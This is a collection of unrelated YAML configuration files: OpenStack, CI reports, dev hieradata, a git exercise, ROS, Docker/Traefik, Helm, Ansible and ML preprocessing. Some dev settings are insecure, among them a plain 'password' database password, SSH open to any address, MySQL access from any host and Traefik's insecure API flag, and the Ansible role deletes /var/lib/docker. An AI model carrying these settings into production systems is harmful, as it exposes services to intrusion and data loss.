panko::keystone::authtoken::auth_uri: {get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
panko::keystone::authtoken::auth_url: { get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
      panko::auth::auth_password: {get_param: PankoPassword}
panko::auth::auth_region: {get_param: KeystoneRegion}
panko::auth::auth_tenant_name: 'service'
panko::expirer::minute: {get_param: PankoExpirerMinute}
panko::expirer::hour: {get_param: PankoExpirerHour}
panko::expirer::monthday: {get_param: PankoExpirerMonthday}
panko::expirer::month: {get_param: PankoExpirerMonth}
panko::expirer::weekday: {get_param: PankoExpirerWeekday}
service_config_settings:
keystone:
panko::keystone::auth::public_url: {get_param: [EndpointMap, PankoPublic, uri]}
panko::keystone::auth::internal_url: {get_param: [EndpointMap, PankoInternal, uri]}
panko::keystone::auth::admin_url: {get_param: [EndpointMap, PankoAdmin, uri]}
panko::keystone::auth::password: {get_param: PankoPassword}
panko::keystone::auth::region: {get_param: KeystoneRegion}
panko::keystone::auth::tenant: 'service'
mysql:
panko::db::mysql::user: panko
panko::db::mysql::password: {get_param: PankoPassword}
panko::db::mysql::host: {get_param: [EndpointMap, MysqlInternal, host_nobrackets]}
panko::db::mysql::dbname: panko
panko::db::mysql::allowed_hosts:
- '%'
- "%{hiera('mysql_bind_host')}"
|
puppet/services/panko-base.yaml
|
---
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23/
timestamp: 2016-07-11 22:26:57 UTC
duration: 1h4m9s
triggered_by: elliott-davis
active_duration: 1h3m45s
parameters:
GIT_REF: cdn/grayscale
EXPIRE_CACHE: false
change:
  git_remote: git@github.com:opscode/delivery.git
git_commit: <PASSWORD>
project: delivery
version: 0.4.623+git.1.4e9aedb
stages:
delivery-promote:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-promote/320/
duration: 0s
delivery-test:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/636/
duration: 7m48s
runs:
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=el-6,project=delivery,role=tester/636/
duration: 7m47s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=el-7,project=delivery,role=tester/636/
duration: 5m42s
ubuntu-12.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=ubuntu-12.04,project=delivery,role=tester/636/
duration: 5m25s
ubuntu-14.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=ubuntu-14.04,project=delivery,role=tester/636/
duration: 6m50s
delivery-build:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/787/
duration: 55m46s
runs:
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=el-6,project=delivery,role=builder/787/
duration: 55m35s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=el-7,project=delivery,role=builder/787/
duration: 51m53s
ubuntu-12.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=ubuntu-12.04,project=delivery,role=builder/787/
duration: 43m52s
delivery-trigger-ad_hoc:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23/
duration: 10s
|
reports/wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23.yaml
|
---
# ---------------------------------------------------------------------
# WARNING: This file is overwritten at deploy time with
# environment-specific stuff. Changes in here are only used by the dev
# VMs and not by a deployed environment.
# You probably want to make your change in pp-deployment, or in a
# role-* yaml file.
# ---------------------------------------------------------------------
domain_name: development.performance.service.gov.uk
pp_environment: dev
ssl_path: '/etc/ssl'
public_ssl_cert: 'certs/ssl-cert-snakeoil.pem'
public_ssl_key: 'private/ssl-cert-snakeoil.key'
environment_ssl_cert: 'certs/ssl-cert-snakeoil.pem'
environment_ssl_key: 'private/ssl-cert-snakeoil.key'
ufw_rules:
allowsshfromanywhere:
port: 22
ip: 'any'
fail2ban::whitelist_ips:
- 127.0.0.1
rabbitmq_sensu_password: '<PASSWORD>'
performanceplatform::base::dhparams: |
-----BEGIN DH PARAMETERS-----
MIICCAKCAgEA/w5nfBG0H8cM2Z2qTcUPzEewjj1iavtD7u8xUCYH8tViPpctWUne
HJ+Fc8Mkz+lgDfVkYtm33qhnuE6GLj9C00+yM0CZaZ0GXvR/DRXIXP//9ZZhtHRy
Tit7dWvTICR43TSIbYESt11ndGifIKsKhQklOnaCpaMvogky2R6NR0vbWdRXUbht
l5kv3PMYpBYb8DRoT3bfQVJB9QjzVbiq1qbyDtO9yYteIC2gTPTWDy4nBp8JbBTZ
ELRXxwEWLHzcxAl77fYcPMm0ynHnEN36EjqCl+YjczyL3by3f5zeUPYVMPWVeH2k
Pk2ocqb1oG9kLaRscV+dr8xLVtTGyysZ0GrO89vtV5uPRKi25lFvE1x6rXf+VLp8
HhKRT+aByJmas2sKJqCUKMwvUQOGW745l6bAchhiPyecura1AAeD4g3D1pIKGTFZ
8M3hCnvLmuWGL9BOFVIuWUhevxQnjAyV4A7LZ3n79sUAk4qki+UNKoQiHZSkNpXH
regGPBVgnFtZ5P0JEkQeSN3MP9GIN76mfuhvKGPmFOny5gfePoG1qmTKtewrUko/
KDSoX3gx9bOkFK31V/O5dgM70oj969lBoE+z4J86wHrlyIaDmQJ3BTIGpVJ97XC1
/ejsy0aBxmwX1/EMYjCQIIGydSoB7pY/C+WXkCMwgPOqIZq90MTz0NMCAQI=
-----END DH PARAMETERS-----
# Keep elasticsearch heapsize low in dev
performanceplatform::elasticsearch::heap_size: '256m'
performanceplatform::hosts::ip:
- "%{::ipaddress_eth1}"
postgresql::server::postgres_password: 'password'
pp_postgres::primary::stagecraft_password: "<PASSWORD>"
performanceplatform::pp_rabbitmq::transformer_password: '<PASSWORD>'
# Nginx configuration to restrict a vhost to the performance platform
pp_only_vhost: ""
|
hieradata/environment.yaml
|
accessible: true
author: <NAME>
context: |-
.. raw:: html
<script defer>
bodyHeight = 0;
function postSize() {
if (document.body.scrollHeight != bodyHeight) {
bodyHeight = document.body.scrollHeight;
window.parent.postMessage({height: document.body.scrollHeight}, "*");
}
};
var target = document.querySelector('body');
var observer = new MutationObserver(postSize);
var config = { attributes: true, subtree: true }
observer.observe(target, config);
$(document).ready(function(){
setTimeout(postSize, 0);
});
</script>
Imaginons que vous avez été imprudent en utilisant ``git reset --hard``
et que vous avez écrasé votre historique distant avec ``git push --force``.
Vous n'avez donc plus vos modifications dans le code, dans la ``staging zone``,
dans votre historique local ou dans votre historique distant.
Néanmoins, c'est rattrapable tant que vous n'avez pas supprimé le dossier ``.git``
de votre projet !
Pour cela, vous devez utiliser les ``reference logs``, accessibles avec ``git reflog``.
Ces logs contiennent tous les changements faits sur toutes les branches de votre historique.
Vous pouvez donc récupérer tous les commits que vous avez écrasés.
Une fois que vous avez identifié le point auquel vous voulez revenir,
il suffit d'utiliser ``git merge`` pour replacer les modifs dans votre repo
(et un traditionnel ``git push`` pour le repo distant).
environment: cpp
evaluate: best
groups: false
input_random: '0'
limits:
output: '2'
time: '30'
memory: '100'
name: Scénario Catastrophe Git 3 - Récupérer le code après avoir supprimé les modifs
de votre code, de l'historique local et distant
network_grading: false
order: 69
problems:
git-reflog:
name: ''
type: file
header: |-
Téléchargez l'`archive <https://inginious.org/course/git/git_catastrophy_scenario_3/git-reflog.zip>`_ qui contient déjà un repository cloné dans le sous-dossier `clone`. Votre repo a des historiques locaux et distants avec juste un commit suite à une mauvaise commande.
Utilisez ``reflog`` pour retrouver tous les commits effacés
et poussez-les sur le repository distant.
Une fois que c'est fait, ré-archivez le dossier complet et uploadez-le.
Notez que le repository "distant" dans cet exercice n'est pas sur github ou dans bitbucket mais dans le dossier `bare.git` de l'archive.
::
git-reflog/
├── bare.git/
| └── [...]
└── clone/
└── [...]
allowed_exts:
- .zip
stored_submissions: 0
submission_limit:
amount: -1
period: -1
tags: {}
weight: 1.0
|
git_catastrophy_scenario_3/task.yaml
|
controller_frequency: 3.0 # rate at which move_base will be called in Hz (default: 20.0)
planner_frequency: 0.5 # rate at which re-calculate the global path, in Hz (default: 0.0)
TrajectoryPlannerROS:
  holonomic_robot: false
  # Parameters for setting the velocity limits of the robot
  max_vel_x: 0.3 # max fwd velocity allowed for the base in mt/s (default: 0.5)
  min_vel_x: 0.05 # min fwd velocity allowed, should be high enough to overcome friction (default: 0.1)
  # Parameters for evaluating possible local planner trajectories
  pdist_scale: 3.0 # weighting for how much the local path should stay close to the global path (default: 0.6)
  gdist_scale: 1.0 # weighting for how much the controller should attempt to reach its local goal, also controls speed (default 0.8)
  occdist_scale: 0.2 # weighting for how much the controller should attempt to avoid obstacles (default 0.01)
  meter_scoring: true # whether or not assume that goal_distance and path_distance are expressed in meters (default: false)
  heading_scoring: false # Whether to score based on the robot's heading to the path or its distance from the path (default: false)
  # Forward simulation parameters
  # Parameters that determine how far in advance and with what granularity trajectories are simulated
  sim_time: 3.5 # The amount of time (in sec) to forward-simulate trajectories, a higher value can result in slightly smoother trajectories (default: 0.025)
  sim_granularity: 0.025 # The step size, in meters, to take between points on a given trajectory (default: 0.025)
  # angular_sim_granularity: 0.5235987756 # The step size, in radians, to take between angular samples on a given trajectory
  # 0.025 rad  1.4323944878 deg
  # 0.0872664626 rad  5 deg
  # 0.1745329252 rad 10 deg
  # 0.2617993878 rad 15 deg
  # 0.5235987756 rad 30 deg
  # 0.7853981634 rad 45 deg
  # 1.0471975512 rad 60 deg
  # 1.5707963268 rad 90 deg
  vx_samples: 20 # The number of samples to use when exploring the x velocity space (int, default: 3) -- must be an integer; the original float 20.0 conflicts with the declared int type
  vtheta_samples: 40 # The number of samples to use when exploring the theta velocity space (int, default: 20)
  # Goal Tolerance Parameters
  yaw_goal_tolerance: 0.2617993878 # default is 0.05 rad (~3 degrees)
  xy_goal_tolerance: 0.2 # in meters, (default: 0.1)
  latch_xy_goal_tolerance: true # (default: false) if the goal position is reached it is considered permanently
  controller_frequency: 10.0 # rate at which TrajectoryPlannerROS will be called in Hz
  # debug parameters
  publish_cost_grid_pc: false
|
config/base_local_planner_params.yaml
|
version: '2.1'
services:
  elasticsearch:
    image: huygensing/elasticsearch:5.6.5
    ports:
      # Port mappings are quoted: unquoted host:container pairs are ambiguous
      # plain scalars in YAML (the base-60 integer trap for values like 22:22).
      - "9201:9200"
  indexer:
    image: huygensing/timbuctoo-elasticsearch-indexer
    environment:
      indexer_elasticsearch_host: "http://elasticsearch:9200"
      indexer_port: "80"
      indexer_timbuctoo_graphql_endpoint: "http://timbuctoo/v5/graphql"
      indexer_timbuctoo_login_endpoint: "http://timbuctoo/v2.1/authenticate"
      timbuctoo_user: ""
      timbuctoo_password: ""
    ports:
      - "3000:80"
  timbuctoo-gui:
    image: huygensing/timbuctoo-gui:v5.7
    environment:
      REACT_APP_BACKEND_URL: "http://localhost:8080"
    ports:
      - "3006:80"
  timbuctoo:
    image: huygensing/timbuctoo
    command: sh -c "if ! [ -f /mapped-data/auth/users.json ]; then mkdir -p /mapped-data/auth; echo '[{\"@type\":\"user\",\"displayName\":\"givenNamesurname\",\"persistentId\":\"pid\",\"_id\":\"bc75a716-7965-49b5-bb93-68004ba0d900\"}]' > /mapped-data/auth/users.json; fi; if ! [ -f /mapped-data/auth/logins.json ]; then mkdir -p /mapped-data/auth; echo '[{\"@type\":\"login\",\"userPid\":\"pid\",\"password\":\"<PASSWORD>=\",\"salt\":\"<PASSWORD>\",\"userName\":\"user\",\"givenName\":\"givenName\",\"surName\":\"surname\",\"emailAddress\":\"email\",\"organization\":\"organization\"}]' > /mapped-data/auth/logins.json; fi; if ! [ -f /mapped-data/datasets/authorizations.json ]; then mkdir -p /mapped-data/datasets; echo '[{\"vreId\":\"indexer\",\"userId\":\"pid\",\"roles\":[\"USER\"]}]' > /mapped-data/datasets/authorizations.json; fi; /app/bin/timbuctoo server /app/example_config.yaml"
    environment:
      timbuctoo_elasticsearch_host: elasticsearch
      timbuctoo_elasticsearch_port: 9200
      base_uri: http://localhost:8080
      JAVA_OPTS: ${JAVA_OPTS}
      timbuctoo_dataPath: ${timbuctoo_dataPath:-/mapped-data}
      timbuctoo_authPath: ${timbuctoo_authPath:-/mapped-data/auth}
    volumes:
      - ./timbuctoo-data/:/mapped-data
    ports:
      - "8080:80"
      - "8081:81"
  timbuctoo-editor:
    build:
      context: ./php-apache
    ports:
      - "8888:80"
    volumes:
      - ./timpars:/var/www/html
|
src/documentation/timbuctoo_configuration/inTimbuctoo/docker-compose.yml
|
version: "3.3"
services:
traefik:
# build:
# context: .
image: traefik:v2.5.5
container_name: "traefik"
command:
#- "--log.level=DEBUG"
- "--api.insecure=true"
- "--providers.docker=true"
- "--entrypoints.web.address=:80"
# Load ldapAuth from local private plugins format ===============================#
# https://github.com/traefik/traefik/pull/8224 #
# "A plugin must be declared in the static configuration" #
# https://doc.traefik.io/traefik-pilot/plugins/overview/#installing-plugins #
- "--experimental.localPlugins.ldapAuth.moduleName=github.com/wiltonsr/ldapAuth" #
# ===============================================================================#
ports:
- "80:80"
- "8080:8080"
volumes:
- "/var/run/docker.sock:/var/run/docker.sock:ro"
- "../../ldapAuth:/plugins-local/src/github.com/wiltonsr/ldapAuth:ro"
whoami:
image: "traefik/whoami"
container_name: "whoami"
labels:
- traefik.http.routers.whoami.rule=Host(`whoami.localhost`)
- traefik.http.routers.whoami.entrypoints=web
# ldapAuth Register Middleware ====================================================================
- traefik.http.routers.whoami.middlewares=ldap_auth
# ldapAuth Options=================================================================================
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.logLevel=DEBUG
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.debug=true
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.url=ldap://ldap.forumsys.com
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.port=389
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.baseDN=dc=example,dc=com
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.attribute=uid
# SearchFilter must not escape curly braces when using labels
# - traefik.http.middlewares.ldap_auth.plugin.ldapAuth.searchFilter=({{.Attribute}}={{.Username}})
# =================================================================================================
|
examples/conf-from-labels.yml
|
nameWithType: FabricReplicator.updateEpochAsync
type: method
members:
- fullName: system.fabric.FabricReplicator.updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
name: updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
nameWithType: FabricReplicator.updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
overridden: system.fabric.Replicator.updateEpochAsync(Epoch,CancellationToken)
parameters:
- description: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. </p>
name: epoch
type: <xref href="system.fabric.Epoch?alt=system.fabric.Epoch&text=Epoch" data-throw-if-not-resolved="False"/>
- description: <p>The <xref uid="system.fabric.CancellationToken" data-throw-if-not-resolved="false" data-raw-source="system.fabric.CancellationToken"></xref> object that the operation is observing. It can be used to send a notification that the operation should be canceled. Note that cancellation is advisory and that the operation might still be completed even if it is canceled. </p>
name: cancellationToken
type: <xref href="system.fabric.CancellationToken?alt=system.fabric.CancellationToken&text=CancellationToken" data-throw-if-not-resolved="False"/>
returns:
description: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. The future completes exceptionally with <xref uid="" data-throw-if-not-resolved="false" data-raw-source="FabricException"></xref> for fabric related failures. </p>
type: <xref href="CompletableFuture?alt=CompletableFuture&text=CompletableFuture" data-throw-if-not-resolved="False"/>
summary: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. </p>
syntax: public CompletableFuture updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
uid: system.fabric.FabricReplicator.updateEpochAsync(Epoch,CancellationToken)
uid: system.fabric.FabricReplicator.updateEpochAsync*
fullName: system.fabric.FabricReplicator.updateEpochAsync
name: updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
package: system.fabric
metadata: {}
|
legacy/docs-ref-autogen/system.fabric.FabricReplicator.updateEpochAsync.yml
|
description: |
  Package the helm chart(s).
  You can add multiple chart repos by defining the following environment variable in your context
  CT_CHART_REPOS=repo_name1=repo_url1,repo_name2=repo_url2
parameters:
  chart_test_config:
    description: |
      Path to local config file with settings to be used by Chart Tester
      For example:
      helm-extra-args: --timeout 600
      validate-maintainers: false
    type: string
    default: ".circleci/helmTestConfig.yaml"
  chart_dir_override:
    description: |
      Due to 'ct list-changed' not working on master (see https://github.com/helm/chart-testing/pull/159)
      Need get changed charts through git command.
      Defaulting to searching in 'helm' dir to look for changes.
    type: string
    default: "helm"
  chart_package_path:
    description: The path where packaged charts will be saved (defaults to a local, relative path)
    type: string
    default: ".cr-release-packages"
  chart_stable_branch:
    description: The branch that should be used to store a chart in stable repository
    type: string
    default: "master"
steps:
  - run:
      shell: /bin/sh
      command: |
        set -e
        # Package up the chart to <<parameters.chart_package_path>>.
        #
        # $ package_chart chart/path
        #
        # NOTE: this script runs under /bin/sh, so only POSIX syntax is used
        # ('function name {', '[[ ]]' and '==' inside '[ ]' are bashisms).
        package_chart() {
          chart=$1
          echo "Packaging chart: '$chart'..."
          helm dependency build "$chart"
          # set the version different for incubator
          if [ "$CIRCLE_BRANCH" = <<parameters.chart_stable_branch>> ]; then
            helm package "$chart" --destination <<parameters.chart_package_path>>
          else
            ver=$(helm inspect chart "$chart" | grep version | cut -d' ' -f2)
            if [ -z "$CIRCLE_TAG" ]; then BRANCH="$CIRCLE_BRANCH"; else BRANCH="$CIRCLE_TAG"; fi
            # Sanitize the version and strip all whitespace inside the command
            # substitution. The original piped the *assignment* into tr
            # (VERSION="$(...)" | tr ...), which ran the assignment in a
            # subshell, discarded tr's input, and left VERSION unset.
            VERSION="$(echo "${ver}-${BRANCH}" | sed -r 's/[\/=_#]+/-/g' | tr -d ' \t\n\r')"
            echo "packaging $chart with version: ${VERSION}"
            # Use the parameter instead of a hard-coded ".cr-release-packages"
            # so a chart_package_path override affects both branches.
            helm package "$chart" -u --version "${VERSION}" --destination <<parameters.chart_package_path>>
          fi
          echo "'$chart' packaged"
          echo "-----"
        }
        helm version -c
        if [ "$CT_CHART_REPOS" ]; then
          for i in $(echo $CT_CHART_REPOS | tr "," " ");
          do
            repo_name=$(echo "$i" | cut -d'=' -f1)
            repo_url=$(echo "$i" | cut -d'=' -f2)
            helm repo add $repo_name $repo_url
          done
        fi
        rm -rf <<parameters.chart_package_path>>; mkdir <<parameters.chart_package_path>>
        # 'ct list-changed' doesn't work on main branch
        # see https://github.com/helm/chart-testing/pull/159
        if [ "$CIRCLE_BRANCH" = <<parameters.chart_stable_branch>> ]; then
          git diff --diff-filter=d --name-only $(git merge-base HEAD^ HEAD) -- <<parameters.chart_dir_override>> | while IFS= read -r file ; do
            if echo "$file" | grep -q "/Chart.yaml"; then
              chart=$(echo "$file" | sed 's/\/Chart.yaml$//')
              package_chart $chart
            fi
          done
        else
          ct list-changed --config <<parameters.chart_test_config>> | while IFS= read -r chart ; do
            chart=$(echo $chart | sed 's/.*Skipping...//g' | sed 's/Version increment checking disabled.//g')
            if [ "$chart" = "" ]; then
              continue
            fi
            package_chart $chart
          done
        fi
      name: "[helm] Package"
|
src/helm/commands/package.yaml
|
url: https://googledrive.tidyverse.org
template:
package: tidytemplate
home:
strip_header: true
authors:
<NAME>:
href: https://jennybryan.org
navbar:
components:
home: ~
news:
text: News
menu:
- text: "Blog posts"
- text: "Version 1.0.0"
href: https://www.tidyverse.org/blog/2019/08/googledrive-1-0-0/
- text: "------------------"
- text: "Change log"
href: news/index.html
reference:
- title: "Reach out and touch your files"
desc: >
Retrieve metadata on your Drive files so you can act on them
contents:
- drive_find
- drive_ls
- drive_get
- drive_reveal
- drive_browse
- title: "File creation and deletion"
desc: >
Create or delete Drive files and folders
contents:
- drive_upload
- drive_put
- drive_download
- drive_create
- drive_mkdir
- drive_cp
- drive_mv
- drive_rename
- drive_update
- drive_trash
- drive_empty_trash
- drive_rm
- drive_example
- title: "Share your files with the world"
desc: >
View or change the sharing and publishing status of Drive files
contents:
- drive_publish
- drive_unpublish
- drive_share
- drive_reveal
- drive_link
- title: "Team Drives"
desc: >
Manipulate and explore Team Drives
contents:
- team_drives
- team_drive_find
- team_drive_get
- team_drive_create
- team_drive_rm
- team_drive_update
- as_team_drive
- title: "Dribble object"
desc: >
Metadata about Drive files is stored in a "Drive tibble" a.k.a. a dribble
contents:
- dribble
- as_dribble
- as_id
- dribble-checks
- title: "Authorization"
desc: >
Take explicit control of the Google auth status or examine current state
contents:
- drive_user
- drive_about
- drive_auth
- drive_deauth
- drive_auth_configure
- title: "Drive API spec"
desc: >
Summon info about or check input against the Drive API spec
contents:
- starts_with("drive_endpoint")
- drive_extension
- drive_fields
- drive_mime_type
- expose
- title: "Programming around the Drive API"
desc: >
Low-level functions used internally and made available for programming
contents:
- request_generate
- request_make
- do_request
- do_paginated_request
- drive_api_key
- drive_token
- drive_has_token
|
_pkgdown.yml
|
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ .Values.jupyterhub.name }}
labels:
{{- include "sqlflow.labels" . | nindent 4 }}
spec:
selector:
matchLabels:
{{- include "sqlflow.selectorLabels" . | nindent 6 }}
{{- if .Values.jupyterhub.strategy }}
strategy:
{{ toYaml .Values.jupyterhub.strategy | trim | indent 4 }}
{{ if eq .Values.jupyterhub.strategy.type "Recreate" }}rollingUpdate: null{{ end }}
{{- end }}
template:
metadata:
{{- with .Values.jupyterhub.podAnnotations }}
annotations:
{{- toYaml . | nindent 8 }}
{{- end }}
labels:
{{- include "sqlflow.selectorLabels" . | nindent 8 }}
spec:
{{- with .Values.imagePullSecrets }}
imagePullSecrets:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "jupyterhub.serviceAccountName" . }}
securityContext:
{{- toYaml .Values.jupyterhub.podSecurityContext | nindent 8 }}
containers:
- name: {{ .Values.jupyterhub.image.name }}
securityContext:
{{- toYaml .Values.jupyterhub.securityContext | nindent 12 }}
image: {{ .Values.jupyterhub.image.repository }}
imagePullPolicy: {{ .Values.jupyterhub.image.pullPolicy }}
env: {{- toYaml .Values.jupyterhub.env | nindent 12 }}
ports:
- name: http
containerPort: {{ .Values.jupyterhub.service.servicePort }}
protocol: TCP
# livenessProbe:
# httpGet:
# path: /health
# port: http
# readinessProbe:
# httpGet:
# path: /health
# port: http
resources:
{{- toYaml .Values.jupyterhub.resources | nindent 12 }}
volumes:
- name: {{ .Values.jupyterhub.persistentVolume.name }}
hostPath:
path: {{ .Values.jupyterhub.persistentVolume.mountPath }}
type: {{ .Values.jupyterhub.persistentVolume.type }}
{{- with .Values.jupyterhub.nodeSelector }}
nodeSelector:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.jupyterhub.affinity }}
affinity:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.jupyterhub.tolerations }}
tolerations:
{{- toYaml . | nindent 8 }}
{{- end }}
|
sqlflow/templates/sqlflow-jupyterhub/deployment.yaml
|
---
- name: Ensure docker is installed
  action: "{{ ansible_pkg_mgr }} name={{ item }} state=present"
  with_items:
    - docker-1.8.2

# Docker doesn't seem to start cleanly the first time run
# when loopback (not directlvm) is configured. Putting in an
# ignore errors, and then sleeping till it can come up cleanly
- name: Try to start docker. This might fail (loopback startup issue)
  service:
    name: docker
    state: started
  ignore_errors: true

- name: Pause for 30 seconds
  pause:
    seconds: 30

- name: Ensure docker is started
  service:
    name: docker
    state: started

- name: Determine if loopback
  shell: docker info | grep 'Data file:.*loop'
  register: loop_device_check
  ignore_errors: true

- debug:
    var: loop_device_check

- name: fail if we don't detect loopback
  fail:
    msg: loopback not detected! Please investigate manually.
  when: loop_device_check.rc == 1

- name: "check to see if {{ dss_docker_device }} exists"
  command: "test -e {{ dss_docker_device }}"
  register: docker_dev_check
  ignore_errors: true

- debug:
    var: docker_dev_check

- name: "fail if {{ dss_docker_device }} doesn't exist"
  fail:
    msg: "{{ dss_docker_device }} doesn't exist. Please investigate"
  when: docker_dev_check.rc != 0

- name: stop docker
  service:
    name: docker
    state: stopped

# The original file ran two identical 'rm -rf /var/lib/docker' tasks
# back to back ("delete ..." and "remove ..."); one is sufficient.
- name: delete /var/lib/docker
  command: rm -rf /var/lib/docker

- name: copy the docker-storage-setup config file
  copy:
    # Literal block scalar: the original used a folded scalar ('>') with a
    # literal "\n", which wrote 'DEVS=...\n VG=docker_vg' as one mangled
    # line (the backslash-n is not an escape in YAML block scalars).
    content: |
      DEVS={{ dss_docker_device }}
      VG=docker_vg
    dest: /etc/sysconfig/docker-storage-setup
    owner: root
    group: root
    # Quoted so the octal mode is not parsed as the decimal integer 436.
    mode: "0664"

- name: docker storage setup
  command: docker-storage-setup
  register: docker_storage_setup_output

- debug:
    msg: "{{ docker_storage_setup_output }}"

- name: extend the vg
  command: lvextend -l 90%VG /dev/docker_vg/docker-pool
  register: lvextend_output

- debug:
    msg: "{{ lvextend_output }}"

- name: start docker
  service:
    name: docker
    state: restarted

- name: docker info
  command: docker info
  register: dockerinfo

- debug:
    msg: "{{ dockerinfo }}"
|
openshift/installer/vendored/openshift-ansible-git-2016-04-18/roles/docker_storage_setup/tasks/main.yml
|
preprocess:
task: summarization # task', metavar='TASK', default="translation", choices=TASK_REGISTRY.keys(), help='task'
source_lang:
# list, ujson.loads
- code_tokens
- docstring_tokens
- sbt
- sbtao
# path and path.terminals
- path
- path.terminals
# - binary_ast # traverse ast's leaf node info
- traversal
target_lang: ~ #", default=None, metavar="TARGET", help="target language"
# ~ path for dataset default. e.g. for code_search_net, ~/filter = ~/.ncc/code_search_net/filter
dataprefs:
ruby:
trainpref: ~/.ncc/code_search_net/filter/ruby/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/ruby/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/ruby/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
go:
trainpref: ~/.ncc/code_search_net/filter/go/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/go/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/go/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
java:
trainpref: ~/.ncc/code_search_net/filter/java/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/java/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/java/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
javascript:
trainpref: ~/.ncc/code_search_net/filter/javascript/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/javascript/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/javascript/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
python:
trainpref: ~/.ncc/code_search_net/filter/python/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/python/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/python/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
php:
trainpref: ~/.ncc/code_search_net/filter/php/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/php/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/php/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
csharp:
trainpref: ~/.ncc/codenn/filter/csharp/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/codenn/filter/csharp/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/codenn/filter/csharp/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
dataset_impl: mmap #', metavar='FORMAT', default='mmap', choices=get_available_dataset_impl(), help='output dataset implementation'
destdir: ~/.ncc/kd/summarization/ #", metavar="DIR", default="data-bin", help="destination dir"
# word frequency
thresholdtgt: 0 #", metavar="N", default=0, type=int, help="map words appearing less than threshold times to unknown"
thresholdsrc: 0 #", metavar="N", default=0, type=int, help="map words appearing less than threshold times to unknown"
# word number
# nwordstgt: -1 #", metavar="N", default=-1, type=int, help="number of target words to retain"
# nwordssrc: -1 #", metavar="N", default=-1, type=int, help="number of source words to retain"
nwordstgt: 50000 #", metavar="N", default=-1, type=int, help="number of target words to retain"
nwordssrc: 50000 #", metavar="N", default=-1, type=int, help="number of source words to retain"
alignfile: ~ #", metavar="ALIGN", default=None, help="an alignment file (optional)"
joined_dictionary: 0 # ", action="store_true", help="Generate joined dictionary"
only_source: 0 # ", action="store_true", help="Only process the source language"
padding_factor: 8 #", metavar="N", default=8, type=int, help="Pad dictionary size to be multiple of N"
workers: 24 # ", metavar="N", default=1, type=int, help="number of parallel workers"
|
dataset/codesearchnet/summarization/config/preprocess_multilingual.yml
|
---
http_interactions:
- request:
method: get
uri: http://gateway.marvel.com/v1/public/stories?apikey=<API_KEY>&hash=<HASH>&limit=1&ts=<TS>
body:
encoding: US-ASCII
string: ''
headers:
User-Agent:
- Faraday v0.12.0.1
Accept-Encoding:
- gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept:
- "*/*"
response:
status:
code: 200
message: OK
headers:
Etag:
- fae6745c6796ade5b090b7b83a7702eeb750b4eb
Content-Type:
- application/json; charset=utf-8
Date:
- Sun, 09 Apr 2017 19:45:21 GMT
Connection:
- keep-alive
Transfer-Encoding:
- chunked
body:
encoding: ASCII-8BIT
string: !binary |-
